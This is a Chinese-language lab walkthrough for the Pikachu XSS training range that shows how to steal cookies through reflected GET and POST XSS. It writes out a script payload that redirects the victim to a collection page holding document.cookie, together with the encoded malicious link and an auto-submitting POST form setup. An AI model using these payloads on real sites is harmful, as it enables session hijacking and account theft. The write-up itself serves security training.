pikachu--XSS(案例一:cookie的竊取和利用)


xss案例

  1. cookie的竊取和利用
  2. 釣魚攻擊
  3. Xss獲取鍵盤記錄

 

在進行案例之前首先要搭建xss后台

搭建xss后台

1.在pikachu文件夾下面,把pkxss單獨放在www下面

 

 

2.修改配置文件  數據庫服務器地址,賬號,密碼.

 

 

3.登錄

 

 

4.安裝

 

 

5.修改   重定向到一個可信的網站

 

 

 

 

 

案例一:

get型xss  cookie值獲取

 修改輸入長度

 

 

輸入框輸入

<script>document.location='http://192.168.27.156/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script>      提交

 

 

就會跳轉到首頁面

 

 

回到pxss那個界面  刷新  得到cookie值

 

 

其中referer

http://192.168.27.156/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.27.156%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit

用戶一旦訪問這個鏈接,它只會跳轉到首頁面,但是我們這樣就已經獲取到cookie值

 

 

post型xss  cookie值獲取

 

 自己可以搭建一個站點,里面寫入惡意的post表單,將這個鏈接(http://192.168.1.5/post.html)發送給用戶,用戶點擊之后,后面就跟上一個一樣了

 

 

首先登陸

 

查看pkxss-xcookie-post.html文件

 就是一旦加載頁面,window.onload就會獲取下面的表單,然后click就是點擊提交,用戶訪問頁面時候就會達到自動發送post請求的目的

 

用戶訪問欺騙的跳轉頁面(http://192.168.1.5/post.html),就會在pxss獲取到cookie值

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM